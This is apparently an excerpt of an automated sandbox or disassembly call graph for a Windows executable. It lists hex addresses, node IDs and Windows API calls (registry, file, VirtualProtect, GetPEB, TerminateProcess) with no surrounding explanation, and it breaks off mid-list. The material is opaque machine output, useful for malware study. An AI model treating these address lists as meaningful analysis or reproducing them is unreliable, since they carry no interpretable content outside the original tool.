9d9e55 98963 9d9e5c 98961->98963 98964 9d9e6b 98961->98964 98962 9d9e34 98980 9d321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98962->98980 98982 9d8ca8 59 API calls __getptd_noexit 98963->98982 98968 9d9d8b __lock 59 API calls 98964->98968 98965->98950 98970 9d9e72 98968->98970 98971 9d9e7f 98970->98971 98972 9d9e97 98970->98972 98983 9d9fab 98971->98983 98986 9d2ed5 98972->98986 98975 9d9e8b 98992 9d9eb3 LeaveCriticalSection _doexit 98975->98992 98978->98959 98979->98962 98981->98961 98982->98965 98984 9d9fc8 InitializeCriticalSectionAndSpinCount 98983->98984 98985 9d9fbb InitializeCriticalSectionEx 98983->98985 98984->98975 98985->98975 98987 9d2ede HeapFree 98986->98987 98988 9d2f07 _free 98986->98988 98987->98988 98989 9d2ef3 98987->98989 98988->98975 98993 9d8ca8 59 API calls __getptd_noexit 98989->98993 98991 9d2ef9 GetLastError 98991->98988 98992->98965 98993->98991 98994->98937 98995->98938 98996->98942 99000 9d9ef5 LeaveCriticalSection 98997->99000 98999 9d2e07 98999->98928 99000->98999 99002 9d0f36 Mailbox 60 API calls 99001->99002 99003 9b77e8 99002->99003 99004 9d0f36 Mailbox 60 API calls 99003->99004 99005 9b77f6 99004->99005 99005->98849 99007 9b88a0 69 API calls 99006->99007 99008 9b8b23 99007->99008 99009 9b8b9d 99008->99009 99010 9b8b2d 99008->99010 99024 9b9e9c 61 API calls Mailbox 99009->99024 99011 9d0f36 Mailbox 60 API calls 99010->99011 99013 9b8b3e 99011->99013 99014 9b77c7 60 API calls 99013->99014 99016 9b8b4c 99013->99016 99014->99016 99015 9b8b5b 99017 9d0f36 Mailbox 60 API calls 99015->99017 99016->99015 99022 9b80d7 60 API calls 2 library calls 99016->99022 99019 9b8b65 99017->99019 99023 9b87c0 69 API calls 99019->99023 99021 9b8b8d 99021->98855 99022->99015 99023->99021 99024->99021 99025->98868 99026 ea1d98 99040 e9f9e8 99026->99040 99028 ea1e66 99043 ea1c88 99028->99043 99046 ea2e98 GetPEB 99040->99046 99042 ea0073 99042->99028 99044 ea1c91 Sleep 99043->99044 99045 ea1c9f 99044->99045 99047 ea2ec2 99046->99047 99047->99042 99048 9be608 99049 9bd260 256 API calls 99048->99049 99050 9be616 99049->99050 99051 9b107d 99056 9b71eb 99051->99056 99053 9b108c 99054 9d2ec0 __cinit 68 API calls 99053->99054 99055 9b1096 99054->99055 99057 9b71fb __ftell_nolock 99056->99057 99058 9b77c7 60 API calls 99057->99058 99059 9b72b1 99058->99059 99087 9b4864 99059->99087 99061 9b72ba 99094 9d068b 99061->99094 99068 9b77c7 60 API calls 99069 9b72eb 99068->99069 99113 9b7eec 99069->99113 99071 9b72f4 RegOpenKeyExW 99072 9eec0a RegQueryValueExW 99071->99072 99076 9b7316 Mailbox 99071->99076 99073 9eec9c RegCloseKey 99072->99073 99074 9eec27 99072->99074 99073->99076 99086 9eecae _wcscat Mailbox __NMSG_WRITE 99073->99086 99075 9d0f36 Mailbox 60 API calls 99074->99075 99077 9eec40 99075->99077 99076->99053 99117 9b538e 99077->99117 99080 9b7b52 60 API calls 99080->99086 99081 9eec68 99120 9b7d2c 99081->99120 99083 9eec82 99083->99073 99084 9b7f41 60 API calls 99084->99086 99085 9b3f84 60 API calls 99085->99086 99086->99076 99086->99080 99086->99084 99086->99085 99129 9e1ac0 99087->99129 99090 9b7f41 60 API calls 99091 9b4897 99090->99091 99131 9b48ae 99091->99131 99093 9b48a1 Mailbox 99093->99061 99095 9e1ac0 __ftell_nolock 99094->99095 99096 9d0698 GetFullPathNameW 99095->99096 99097 9d06ba 99096->99097 99098 9b7d2c 60 API calls 99097->99098 99099 9b72c5 99098->99099 99100 9b7e0b 99099->99100 99101 9b7e1f 99100->99101 99102 9ef0a3 99100->99102 99153 9b7db0 99101->99153 99158 9b8189 99102->99158 99105 9b72d3 99107 9b3f84 99105->99107 99106 9ef0ae __NMSG_WRITE _memmove 99108 9b3f92 99107->99108 99112 9b3fb4 _memmove 99107->99112 99110 9d0f36 Mailbox 60 API calls 99108->99110 99109 9d0f36 Mailbox 60 API calls 99111 9b3fc8 99109->99111 99110->99112 99111->99068 99112->99109 99114 9b7ef9 99113->99114 99115 9b7f06 99113->99115 99114->99071 99116 9d0f36 Mailbox 60 API calls 99115->99116 99116->99114 99118 9d0f36 Mailbox 60 API calls 99117->99118 99119 9b53a0 RegQueryValueExW 99118->99119 99119->99081 99119->99083 99121 9b7d38 __NMSG_WRITE 99120->99121 99122 9b7da5 99120->99122 99124 9b7d4e 99121->99124 99125 9b7d73 99121->99125 99123 9b7e8c 60 API calls 99122->99123 99128 9b7d56 _memmove 99123->99128 99161 9b8087 60 API calls Mailbox 99124->99161 99127 9b8189 60 API calls 99125->99127 99127->99128 99128->99083 99130 9b4871 GetModuleFileNameW 99129->99130 99130->99090 99132 9e1ac0 __ftell_nolock 99131->99132 99133 9b48bb GetFullPathNameW 99132->99133 99134 9b48da 99133->99134 99135 9b48f7 99133->99135 99137 9b7d2c 60 API calls 99134->99137 99136 9b7eec 60 API calls 99135->99136 99138 9b48e6 99136->99138 99137->99138 99141 9b7886 99138->99141 99142 9b7894 99141->99142 99145 9b7e8c 99142->99145 99144 9b48f2 99144->99093 99146 9b7e9a 99145->99146 99147 9b7ea3 _memmove 99145->99147 99146->99147 99149 9b7faf 99146->99149 99147->99144 99150 9b7fc2 99149->99150 99152 9b7fbf _memmove 99149->99152 99151 9d0f36 Mailbox 60 API calls 99150->99151 99151->99152 99152->99147 99154 9b7dbf __NMSG_WRITE 99153->99154 99155 9b8189 60 API calls 99154->99155 99156 9b7dd0 _memmove 99154->99156 99157 9ef060 _memmove 99155->99157 99156->99105 99159 9d0f36 Mailbox 60 API calls 99158->99159 99160 9b8193 99159->99160 99160->99106 99161->99128 99162 9f44c8 99166 a0625a 99162->99166 99164 9f44d3 99165 a0625a 86 API calls 99164->99165 99165->99164 99172 a06294 99166->99172 99174 a06267 99166->99174 99167 a06296 99205 9b9488 85 API calls Mailbox 99167->99205 99168 a0629b 99177 9b9997 99168->99177 99172->99164 99174->99167 99174->99168 99174->99172 99175 a0628e 99174->99175 99204 9b9700 60 API calls _wcsstr 99175->99204 99178 9b99b1 99177->99178 99186 9b99ab 99177->99186 99179 9ef92c __i64tow 99178->99179 99180 9b99f9 99178->99180 99181 9ef833 99178->99181 99183 9b99b7 __itow 99178->99183 99206 9d3818 84 API calls 3 library calls 99180->99206 99188 9d0f36 Mailbox 60 API calls 99181->99188 99193 9ef8ab Mailbox _wcscpy 99181->99193 99185 9d0f36 Mailbox 60 API calls 99183->99185 99187 9b99d1 99185->99187 99195 9b7c8e 99186->99195 99187->99186 99189 9b7f41 60 API calls 99187->99189 99190 9ef878 99188->99190 99189->99186 99191 9d0f36 Mailbox 60 API calls 99190->99191 99192 9ef89e 99191->99192 99192->99193 99194 9b7f41 60 API calls 99192->99194 99207 9d3818 84 API calls 3 library calls 99193->99207 99194->99193 99196 9eefc4 99195->99196 99197 9b7ca0 99195->99197 99214 a07f03 60 API calls _memmove 99196->99214 99208 9b7bb1 99197->99208 99200 9b7cac 99200->99172 99201 9eefce 99202 9b81a7 60 API calls 99201->99202 99203 9eefd6 Mailbox 99202->99203 99204->99172 99205->99168 99206->99183 99207->99179 99209 9b7bbf 99208->99209 99210 9b7be5 _memmove 99208->99210 99209->99210 99211 9d0f36 Mailbox 60 API calls 99209->99211 99210->99200 99212 9b7c34 99211->99212 99213 9d0f36 Mailbox 60 API calls 99212->99213 99213->99210 99214->99201 99215 9b3633 99216 9b366a 99215->99216 99217 9b3688 99216->99217 99218 9b36e7 99216->99218 99254 9b36e5 99216->99254 99219 9b375d PostQuitMessage 99217->99219 99220 9b3695 99217->99220 99222 9ed24c 99218->99222 99223 9b36ed 99218->99223 99257 9b36d8 99219->99257 99224 9ed2bf 99220->99224 99225 9b36a0 99220->99225 99221 9b36ca DefWindowProcW 99221->99257 99265 9c11d0 10 API calls Mailbox 99222->99265 99227 9b36f2 99223->99227 99228 9b3715 SetTimer RegisterWindowMessageW 99223->99228 99270 a1281f 72 API calls _memset 99224->99270 99229 9b36a8 99225->99229 99230 9b3767 99225->99230 99234 9ed1ef 99227->99234 99235 9b36f9 KillTimer 99227->99235 99231 9b373e CreatePopupMenu 99228->99231 99228->99257 99236 9b36b3 99229->99236 99237 9ed2a4 99229->99237 99263 9b4531 65 API calls _memset 99230->99263 99231->99257 99233 9ed273 99266 9c11f3 256 API calls Mailbox 99233->99266 99241 9ed228 MoveWindow 99234->99241 99242 9ed1f4 99234->99242 99260 9b44cb Shell_NotifyIconW _memset 99235->99260 99244 9b374b 99236->99244 99245 9b36be 99236->99245 99237->99221 99269 a07f5e 60 API calls Mailbox 99237->99269 99238 9ed2d1 99238->99221 99238->99257 99241->99257 99247 9ed1f8 99242->99247 99248 9ed217 SetFocus 99242->99248 99262 9b45df 82 API calls _memset 99244->99262 99245->99221 99267 9b44cb Shell_NotifyIconW _memset 99245->99267 99246 9b375b 99246->99257 99247->99245 99252 9ed201 99247->99252 99248->99257 99249 9b370c 99261 9b3114 DeleteObject DestroyWindow Mailbox 99249->99261 99264 9c11d0 10 API calls Mailbox 99252->99264 99254->99221 99258 9ed298 99268 9b43db 69 API calls _memset 99258->99268 99260->99249 99261->99257 99262->99246 99263->99246 99264->99257 99265->99233 99266->99245 99267->99258 99268->99254 99269->99254 99270->99238 99271 9f0155 99273 9bae4f Mailbox 99271->99273 99272 9bb6d1 99363 a19ed4 90 API calls 4 library calls 99272->99363 99273->99272 99275 9f0bb5 99273->99275 99277 9f0bbe 99273->99277 99279 9f00e9 VariantClear 99273->99279 99287 9b5dcf 99273->99287 99291 a24570 99273->99291 99300 a2e037 99273->99300 99303 9b5934 99273->99303 99308 a187be 99273->99308 99312 a1dee9 99273->99312 99315 a1d107 99273->99315 99362 9b9df0 60 API calls Mailbox 99273->99362 99364 a063f2 99275->99364 99279->99273 99288 9b5dd9 99287->99288 99289 9b5de8 99287->99289 99288->99273 99289->99288 99290 9b5ded CloseHandle 99289->99290 99290->99288 99292 9b9997 85 API calls 99291->99292 99293 a245aa 99292->99293 99367 9b63a0 99293->99367 99295 a245ba 99296 a245df 99295->99296 99297 9ba000 256 API calls 99295->99297 99299 a245e3 99296->99299 99393 9b9bf8 60 API calls Mailbox 99296->99393 99297->99296 99299->99273 99407 a2cbf1 99300->99407 99302 a2e047 99302->99273 99304 9b5dcf CloseHandle 99303->99304 99305 9b593c Mailbox 99304->99305 99306 9b5dcf CloseHandle 99305->99306 99307 9b594b 99306->99307 99307->99273 99309 a187c7 99308->99309 99310 a187cc 99308->99310 99519 a1785c 99309->99519 99310->99273 99542 a1f2c6 99312->99542 99314 a1def9 99314->99273 99316 a1d131 99315->99316 99317 a1d126 99315->99317 99319 a1d20b Mailbox 99316->99319 99322 9b77c7 60 API calls 99316->99322 99619 9b9c9c 60 API calls 99317->99619 99320 9d0f36 Mailbox 60 API calls 99319->99320 99358 a1d214 Mailbox 99319->99358 99321 a1d254 99320->99321 99324 a1d260 99321->99324 99624 9b5906 61 API calls Mailbox 99321->99624 99323 a1d155 99322->99323 99325 9b77c7 60 API calls 99323->99325 99327 9b9997 85 API calls 99324->99327 99328 a1d15e 99325->99328 99329 a1d278 99327->99329 99330 9b9997 85 API calls 99328->99330 99331 9b5956 68 API calls 99329->99331 99332 a1d16a 99330->99332 99333 a1d287 99331->99333 99620 9b46f9 60 API calls Mailbox 99332->99620 99335 a1d28b GetLastError 99333->99335 99336 a1d2bf 99333->99336 99338 a1d2a4 99335->99338 99340 a1d321 99336->99340 99341 a1d2ea 99336->99341 99337 a1d17f 99339 9b7c8e 60 API calls 99337->99339 99338->99358 99625 9b5a1a CloseHandle 99338->99625 99342 a1d1b2 99339->99342 99345 9d0f36 Mailbox 60 API calls 99340->99345 99343 9d0f36 Mailbox 60 API calls 99341->99343 99344 a1d204 99342->99344 99621 a13c7b GetFileAttributesW FindFirstFileW FindClose 99342->99621 99346 a1d2ef 99343->99346 99623 9b9c9c 60 API calls 99344->99623 99350 a1d326 99345->99350 99351 a1d300 99346->99351 99353 9b77c7 60 API calls 99346->99353 99355 9b77c7 60 API calls 99350->99355 99350->99358 99626 a1f656 60 API calls 2 library calls 99351->99626 99352 a1d1c2 99352->99344 99354 a1d1c6 99352->99354 99353->99351 99357 9b7f41 60 API calls 99354->99357 99355->99358 99359 a1d1d3 99357->99359 99358->99273 99622 a13a6e 64 API calls Mailbox 99359->99622 99361 a1d1dc Mailbox 99361->99344 99362->99273 99363->99275 99627 a06334 99364->99627 99366 a06400 99366->99277 99394 9b7b76 99367->99394 99369 9b65ca 99401 9b766f 60 API calls 2 library calls 99369->99401 99371 9b65e4 Mailbox 99371->99295 99374 9ee31b _memmove 99376 9ee34f 99374->99376 99385 9b68f9 99374->99385 99375 9b766f 60 API calls 99377 9b63c5 99375->99377 99404 a0fbdb 92 API calls 4 library calls 99376->99404 99377->99369 99377->99374 99377->99375 99377->99376 99381 9b7eec 60 API calls 99377->99381 99377->99385 99386 9ee2eb 99377->99386 99390 9b7faf 60 API calls 99377->99390 99399 9b60cc 61 API calls 99377->99399 99400 9b5ea1 60 API calls Mailbox 99377->99400 99402 9b5fd2 61 API calls 99377->99402 99403 9b7a84 60 API calls 2 library calls 99377->99403 99381->99377 99382 9ee35d 99405 9b766f 60 API calls 2 library calls 99382->99405 99384 9ee373 99384->99371 99385->99371 99406 a0fbdb 92 API calls 4 library calls 99385->99406 99387 9b8189 60 API calls 99386->99387 99389 9ee2f6 99387->99389 99392 9d0f36 Mailbox 60 API calls 99389->99392 99391 9b659b CharUpperBuffW 99390->99391 99391->99377 99392->99374 99393->99299 99395 9d0f36 Mailbox 60 API calls 99394->99395 99396 9b7b9b 99395->99396 99397 9b8189 60 API calls 99396->99397 99398 9b7baa 99397->99398 99398->99377 99399->99377 99400->99377 99401->99371 99402->99377 99403->99377 99404->99382 99405->99384 99406->99371 99408 9b9997 85 API calls 99407->99408 99409 a2cc2e 99408->99409 99428 a2cc75 Mailbox 99409->99428 99445 a2d8b9 99409->99445 99411 a2cecd 99412 a2d042 99411->99412 99416 a2cedb 99411->99416 99495 a2d9dc 93 API calls Mailbox 99412->99495 99415 a2d051 99415->99416 99418 a2d05d 99415->99418 99458 a2ca82 99416->99458 99417 9b9997 85 API calls 99434 a2ccc6 Mailbox 99417->99434 99418->99428 99423 a2cf14 99473 9d0d88 99423->99473 99426 a2cf47 99480 9b942e 99426->99480 99427 a2cf2e 99479 a19ed4 90 API calls 4 library calls 99427->99479 99428->99302 99431 a2cf39 GetCurrentProcess TerminateProcess 99431->99426 99434->99411 99434->99417 99434->99428 99477 a1f656 60 API calls 2 library calls 99434->99477 99478 a2d0f3 62 API calls 2 library calls 99434->99478 99437 a2d0b8 99437->99428 99441 a2d0cc FreeLibrary 99437->99441 99438 a2cf7f 99492 a2d75d 108 API calls _free 99438->99492 99441->99428 99444 a2cf90 99444->99437 99493 9b8ea0 60 API calls Mailbox 99444->99493 99494 9b9e9c 61 API calls Mailbox 99444->99494 99496 a2d75d 108 API calls _free 99444->99496 99446 9b7faf 60 API calls 99445->99446 99447 a2d8d4 CharLowerBuffW 99446->99447 99497 a0f479 99447->99497 99451 9b77c7 60 API calls 99452 a2d90d 99451->99452 99504 9b79ab 60 API calls 2 library calls 99452->99504 99454 a2d96c Mailbox 99454->99434 99455 a2d924 99456 9b7e8c 60 API calls 99455->99456 99457 a2d930 Mailbox 99456->99457 99457->99454 99505 a2d0f3 62 API calls 2 library calls 99457->99505 99459 a2ca9d 99458->99459 99463 a2caf2 99458->99463 99460 9d0f36 Mailbox 60 API calls 99459->99460 99462 a2cabf 99460->99462 99461 9d0f36 Mailbox 60 API calls 99461->99462 99462->99461 99462->99463 99464 a2db64 99463->99464 99465 a2dd8d Mailbox 99464->99465 99469 a2db87 _strcat _wcscpy __NMSG_WRITE 99464->99469 99465->99423 99466 9b9c9c 60 API calls 99466->99469 99467 9b9cf8 60 API calls 99467->99469 99468 9b9d46 60 API calls 99468->99469 99469->99465 99469->99466 99469->99467 99469->99468 99470 9d588c 59 API calls _W_store_winword 99469->99470 99471 9b9997 85 API calls 99469->99471 99508 a1592e 62 API calls 2 library calls 99469->99508 99470->99469 99471->99469 99474 9d0d9d 99473->99474 99475 9d0e35 VirtualProtect 99474->99475 99476 9d0e03 99474->99476 99475->99476 99476->99426 99476->99427 99477->99434 99478->99434 99479->99431 99481 9b9436 99480->99481 99482 9d0f36 Mailbox 60 API calls 99481->99482 99483 9b9444 99482->99483 99485 9b9450 99483->99485 99509 9b935c 60 API calls Mailbox 99483->99509 99486 9b91b0 99485->99486 99510 9b92c0 99486->99510 99488 9b91bf 99489 9d0f36 Mailbox 60 API calls 99488->99489 99490 9b925b 99488->99490 99489->99490 99490->99444 99491 9b8ea0 60 API calls Mailbox 99490->99491 99491->99438 99492->99444 99493->99444 99494->99444 99495->99415 99496->99444 99498 a0f4a4 __NMSG_WRITE 99497->99498 99499 a0f4e3 99498->99499 99502 a0f4d9 99498->99502 99503 a0f58a 99498->99503 99499->99451 99499->99457 99502->99499 99506 9b7a24 62 API calls 99502->99506 99503->99499 99507 9b7a24 62 API calls 99503->99507 99504->99455 99505->99454 99506->99502 99507->99503 99508->99469 99509->99485 99511 9b92c9 Mailbox 99510->99511 99512 9ef4f8 99511->99512 99517 9b92d3 99511->99517 99513 9d0f36 Mailbox 60 API calls 99512->99513 99515 9ef504 99513->99515 99514 9b92da 99514->99488 99517->99514 99518 9b9df0 60 API calls Mailbox 99517->99518 99518->99517 99520 a17873 99519->99520 99538 a17993 99519->99538 99521 a1788b 99520->99521 99522 a178b3 99520->99522 99524 a178ca 99520->99524 99521->99522 99526 a1789b 99521->99526 99523 9d0f36 Mailbox 60 API calls 99522->99523 99535 a178a9 Mailbox _memmove 99523->99535 99525 a178e7 99524->99525 99527 9d0f36 Mailbox 60 API calls 99524->99527 99528 a17920 99525->99528 99529 a17912 99525->99529 99525->99535 99534 9d0f36 Mailbox 60 API calls 99526->99534 99527->99525 99530 9d0f36 Mailbox 60 API calls 99528->99530 99531 9d0f36 Mailbox 60 API calls 99529->99531 99532 a17926 99530->99532 99531->99535 99540 a17514 60 API calls Mailbox 99532->99540 99533 9d0f36 Mailbox 60 API calls 99533->99538 99534->99535 99535->99533 99537 a17932 99541 9b5b75 62 API calls Mailbox 99537->99541 99538->99310 99540->99537 99541->99535 99543 a1f2e1 99542->99543 99544 a1f33b 99542->99544 99545 9d0f36 Mailbox 60 API calls 99543->99545 99595 a1f600 60 API calls 99544->99595 99547 a1f2e8 99545->99547 99548 a1f2f4 99547->99548 99582 9b5906 61 API calls Mailbox 99547->99582 99550 9b9997 85 API calls 99548->99550 99555 a1f306 99550->99555 99551 a1f414 99554 a187be 62 API calls 99551->99554 99552 a1f348 99552->99551 99553 a1f322 99552->99553 99559 a1f388 99552->99559 99553->99314 99556 a1f41b 99554->99556 99583 9b5956 99555->99583 99579 a1349e 99556->99579 99561 9b9997 85 API calls 99559->99561 99560 a1f316 99560->99553 99594 9b5a1a CloseHandle 99560->99594 99567 a1f38f 99561->99567 99564 a1f40a 99597 a134ed 67 API calls Mailbox 99564->99597 99565 a1f3c3 99568 9b7b76 60 API calls 99565->99568 99567->99564 99567->99565 99570 a1f3d3 99568->99570 99569 9b5dcf CloseHandle 99571 a1f469 99569->99571 99572 9b81a7 60 API calls 99570->99572 99571->99553 99598 9b5a1a CloseHandle 99571->99598 99573 a1f3dd 99572->99573 99574 9b7e0b 60 API calls 99573->99574 99576 a1f3eb 99574->99576 99596 a134ed 67 API calls Mailbox 99576->99596 99578 a1f3f7 Mailbox 99578->99553 99578->99569 99599 a1339d 99579->99599 99581 a134aa WriteFile 99581->99578 99582->99548 99584 9b5dcf CloseHandle 99583->99584 99585 9b5962 99584->99585 99608 9b5df9 99585->99608 99587 9b5981 99591 9b59a4 99587->99591 99616 9b5770 63 API calls Mailbox 99587->99616 99589 9b5993 99617 9b53db SetFilePointerEx SetFilePointerEx 99589->99617 99591->99552 99591->99560 99592 9b599a 99592->99591 99593 a1349e 3 API calls 99592->99593 99593->99591 99594->99553 99595->99552 99596->99578 99597->99578 99598->99553 99600 a133a4 99599->99600 99601 a133af 99599->99601 99606 9b5dae SetFilePointerEx 99600->99606 99601->99581 99603 a13409 SetFilePointerEx 99607 9b5dae SetFilePointerEx 99603->99607 99605 a13428 99605->99581 99606->99603 99607->99605 99609 9b5e12 CreateFileW 99608->99609 99610 9ee0b1 99608->99610 99612 9b5e34 99609->99612 99611 9ee0b7 CreateFileW 99610->99611 99610->99612 99611->99612 99613 9ee0dd 99611->99613 99612->99587 99618 9b5c4e SetFilePointerEx SetFilePointerEx 99613->99618 99615 9ee0e8 99615->99612 99616->99589 99617->99592 99618->99615 99619->99316 99620->99337 99621->99352 99622->99361 99623->99319 99624->99324 99625->99358 99626->99358 99628 a0635c 99627->99628 99629 a0633f 99627->99629 99628->99366 99629->99628 99631 a0631f 60 API calls Mailbox 99629->99631 99631->99629 99632 9efe35 99633 9efe3f 99632->99633 99669 9bac90 Mailbox _memmove 99632->99669 99775 9b8e34 60 API calls Mailbox 99633->99775 99635 9d0f36 60 API calls Mailbox 99635->99669 99638 9d0f36 60 API calls Mailbox 99658 9ba097 Mailbox 99638->99658 99640 9bb5d5 99644 9b81a7 60 API calls 99640->99644 99654 9ba1b7 99644->99654 99645 9f03ae 99779 a19ed4 90 API calls 4 library calls 99645->99779 99646 9bb5da 99785 a19ed4 90 API calls 4 library calls 99646->99785 99648 9b7f41 60 API calls 99648->99669 99650 9b81a7 60 API calls 99650->99658 99651 9b77c7 60 API calls 99651->99658 99652 9f03bd 99653 a071e5 60 API calls 99653->99658 99656 a063f2 Mailbox 60 API calls 99656->99654 99657 9f0d2f 99784 a19ed4 90 API calls 4 library calls 99657->99784 99658->99638 99658->99640 99658->99645 99658->99646 99658->99650 99658->99651 99658->99653 99658->99654 99658->99657 99660 9d2ec0 68 API calls __cinit 99658->99660 99662 9ba6ba 99658->99662 99769 9bca20 256 API calls 2 library calls 99658->99769 99770 9bba60 61 API calls Mailbox 99658->99770 99660->99658 99783 a19ed4 90 API calls 4 library calls 99662->99783 99663 a063f2 Mailbox 60 API calls 99663->99669 99664 9bb416 99774 9bf803 256 API calls 99664->99774 99665 9ba000 256 API calls 99665->99669 99667 9f0bc3 99781 9b9df0 60 API calls Mailbox 99667->99781 99669->99635 99669->99648 99669->99654 99669->99658 99669->99663 99669->99664 99669->99665 99669->99667 99670 9f0bd1 99669->99670 99673 9bb37c 99669->99673 99677 9bade2 Mailbox 99669->99677 99679 9bb685 99669->99679 99691 a2c3f4 99669->99691 99723 a179ff 99669->99723 99729 a2bd80 99669->99729 99776 a071e5 60 API calls 99669->99776 99777 a2c2a7 86 API calls 2 library calls 99669->99777 99782 a19ed4 90 API calls 4 library calls 99670->99782 99672 9f0bb5 99672->99654 99672->99656 99772 9b9e9c 61 API calls Mailbox 99673->99772 99675 9bb38d 99773 9b9e9c 61 API calls Mailbox 99675->99773 99677->99679 99682 9bae4f 99677->99682 99778 a071e5 60 API calls 99677->99778 99780 a19ed4 90 API calls 4 library calls 99679->99780 99682->99654 99682->99672 99682->99679 99683 9f00e9 VariantClear 99682->99683 99684 a24570 256 API calls 99682->99684 99685 9b5dcf CloseHandle 99682->99685 99686 a2e037 131 API calls 99682->99686 99687 a1d107 102 API calls 99682->99687 99688 a1dee9 98 API calls 99682->99688 99689 9b5934 CloseHandle 99682->99689 99690 a187be 62 API calls 99682->99690 99771 9b9df0 60 API calls Mailbox 99682->99771 99683->99682 99684->99682 99685->99682 99686->99682 99687->99682 99688->99682 99689->99682 99690->99682 99692 9b77c7 60 API calls 99691->99692 99693 a2c408 99692->99693 99694 9b77c7 60 API calls 99693->99694 99695 a2c410 99694->99695 99696 9b77c7 60 API calls 99695->99696 99697 a2c418 99696->99697 99698 9b9997 85 API calls 99697->99698 99721 a2c426 99698->99721 99699 9b7d2c 60 API calls 99699->99721 99700 a2c60f 99701 a2c63c Mailbox 99700->99701 99788 9b9b9c 60 API calls Mailbox 99700->99788 99701->99669 99703 a2c5f6 99707 9b7e0b 60 API calls 99703->99707 99704 9b7a84 60 API calls 99704->99721 99705 a2c611 99709 9b7e0b 60 API calls 99705->99709 99706 9b81a7 60 API calls 99706->99721 99708 a2c603 99707->99708 99712 9b7c8e 60 API calls 99708->99712 99710 a2c620 99709->99710 99713 9b7c8e 60 API calls 99710->99713 99711 9b7faf 60 API calls 99715 a2c4bd CharUpperBuffW 99711->99715 99712->99700 99713->99700 99714 9b7faf 60 API calls 99716 a2c57d CharUpperBuffW 99714->99716 99786 9b859a 69 API calls 99715->99786 99787 9bc707 70 API calls 2 library calls 99716->99787 99719 9b9997 85 API calls 99719->99721 99720 9b7c8e 60 API calls 99720->99721 99721->99699 99721->99700 99721->99701 99721->99703 99721->99704 99721->99705 99721->99706 99721->99711 99721->99714 99721->99719 99721->99720 99722 9b7e0b 60 API calls 99721->99722 99722->99721 99724 a17a0b 99723->99724 99725 9d0f36 Mailbox 60 API calls 99724->99725 99726 a17a19 99725->99726 99727 a17a27 99726->99727 99728 9b77c7 60 API calls 99726->99728 99727->99669 99728->99727 99730 a2bdc5 99729->99730 99731 a2bdab 99729->99731 99790 a2a328 60 API calls Mailbox 99730->99790 99789 a19ed4 90 API calls 4 library calls 99731->99789 99734 a2bdd0 99735 9ba000 255 API calls 99734->99735 99736 a2be31 99735->99736 99737 a2bec3 99736->99737 99741 a2be72 99736->99741 99762 a2bdbd Mailbox 99736->99762 99738 a2bf19 99737->99738 99739 a2bec9 99737->99739 99740 9b9997 85 API calls 99738->99740 99738->99762 99808 a179c3 60 API calls 99739->99808 99742 a2bf2b 99740->99742 99791 a17388 60 API calls Mailbox 99741->99791 99745 9b7faf 60 API calls 99742->99745 99748 a2bf4f CharUpperBuffW 99745->99748 99746 a2beec 99809 9b5ea1 60 API calls Mailbox 99746->99809 99747 a2bea2 99792 9bf5c0 99747->99792 99752 a2bf69 99748->99752 99751 a2bef4 Mailbox 99810 9bfe40 99751->99810 99753 a2bf70 99752->99753 99754 a2bfbc 99752->99754 99890 a17388 60 API calls Mailbox 99753->99890 99756 9b9997 85 API calls 99754->99756 99757 a2bfc4 99756->99757 99891 9b9fbd 61 API calls 99757->99891 99760 a2bf9e 99761 9bf5c0 255 API calls 99760->99761 99761->99762 99762->99669 99763 a2bfce 99763->99762 99764 9b9997 85 API calls 99763->99764 99765 a2bfe9 99764->99765 99892 9b5ea1 60 API calls Mailbox 99765->99892 99767 a2bff9 99768 9bfe40 255 API calls 99767->99768 99768->99762 99769->99658 99770->99658 99771->99682 99772->99675 99773->99664 99774->99679 99775->99669 99776->99669 99777->99669 99778->99677 99779->99652 99780->99672 99781->99672 99782->99672 99783->99654 99784->99646 99785->99654 99786->99721 99787->99721 99788->99701 99789->99762 99790->99734 99791->99747 99793 9bf61a 99792->99793 99794 9bf7b0 99792->99794 99795 9f4777 99793->99795 99796 9bf626 99793->99796 99797 9b7f41 60 API calls 99794->99797 99798 a2bd80 256 API calls 99795->99798 99893 9bf3f0 256 API calls 2 library calls 99796->99893 99800 9bf6ec Mailbox 99797->99800 99801 9f4785 99798->99801 99807 a24570 256 API calls 99800->99807 99802 9bf790 99801->99802 99895 a19ed4 90 API calls 4 library calls 99801->99895 99802->99762 99803 9bf65d 99803->99800 99803->99801 99803->99802 99806 9bf743 99806->99802 99894 9b9df0 60 API calls Mailbox 99806->99894 99807->99806 99808->99746 99809->99751 99896 9b82e0 99810->99896 99812 9bfe9d 99813 9f4a86 99812->99813 99874 9c0856 99812->99874 99901 9bf394 99812->99901 99994 a19ed4 90 API calls 4 library calls 99813->99994 99817 9f4be6 99822 9bffac 99817->99822 99869 9f4a9b 99817->99869 100000 a2a3ee 86 API calls Mailbox 99817->100000 99818 9bff9e 99818->99817 99818->99822 99998 a06a42 60 API calls 2 library calls 99818->99998 99819 9f4eac 99819->99869 100010 a19ed4 90 API calls 4 library calls 99819->100010 99820 9c0677 99827 9d0f36 Mailbox 60 API calls 99820->99827 99821 9f4b30 99821->99869 99996 a19ed4 90 API calls 4 library calls 99821->99996 99822->99819 99830 9f4c52 99822->99830 99905 9b84dc 99822->99905 99825 9d0f36 60 API calls Mailbox 99851 9bff33 99825->99851 99837 9c06a5 _memmove 99827->99837 99828 9f4ba1 99999 a06363 60 API calls 2 library calls 99828->99999 99838 9f4c70 99830->99838 100002 9b8720 60 API calls Mailbox 99830->100002 99833 9f4aae 99833->99821 99995 9bf803 256 API calls 99833->99995 99835 9f4c0b Mailbox 99835->99822 100001 a06a42 60 API calls 2 library calls 99835->100001 99844 9d0f36 Mailbox 60 API calls 99837->99844 99842 9f4c81 99838->99842 100003 9b8720 60 API calls Mailbox 99838->100003 99839 9c0004 99847 9f4e2f 99839->99847 99848 9c0092 99839->99848 99853 9c02d9 Mailbox _memmove 99839->99853 99840 9f4bc4 99843 9ba000 256 API calls 99840->99843 99842->99853 100004 a0631f 60 API calls Mailbox 99842->100004 99843->99817 99854 9c0266 _memmove 99844->99854 100008 a19b90 61 API calls 99847->100008 99849 9d0f36 Mailbox 60 API calls 99848->99849 99856 9c0099 99849->99856 99851->99818 99851->99820 99851->99825 99851->99833 99851->99837 99855 9ba000 256 API calls 99851->99855 99864 9f4b65 99851->99864 99851->99869 99860 9b8b13 70 API calls 99853->99860 99863 9b88a0 69 API calls 99853->99863 99867 9f4e0b 99853->99867 99853->99874 99875 9c04f8 99853->99875 99877 9d0f36 60 API calls Mailbox 99853->99877 99883 9f4d75 99853->99883 99888 9f4da6 99853->99888 99991 